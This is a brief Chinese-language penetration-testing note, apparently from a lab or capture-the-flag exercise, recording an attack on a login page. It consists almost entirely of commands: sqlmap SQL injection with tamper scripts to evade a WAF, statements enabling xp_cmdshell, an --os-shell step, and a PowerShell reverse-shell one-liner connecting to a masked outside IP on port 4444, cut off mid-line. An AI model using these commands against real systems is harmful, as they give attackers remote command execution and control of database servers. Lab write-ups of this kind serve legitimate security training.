192.121
/login.aspx 存在 SQL 注入
通过sqlmap执行命令开启xp_cmdshell
需要使用 tamper 来绕过 WAF
--tamper=htmlencode,apostrophemask,percentage --no-cast --time-sec 30
开启 xp_cmdshell
sqlmap -r /root/Desktop/Labs/challenge_1/121/sqlmap --batch --sql-query "EXEC sp_configure 'show advanced options', 1;"
’
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
‘
sqlmap -r /root/Desktop/Labs/challenge_1/121/sqlmap --os-shell
使用 --os-shell 并执行以下命令得到反弹 shell
powershell -NoP -NonI -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TcpClient('*.*.*.*', 4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sen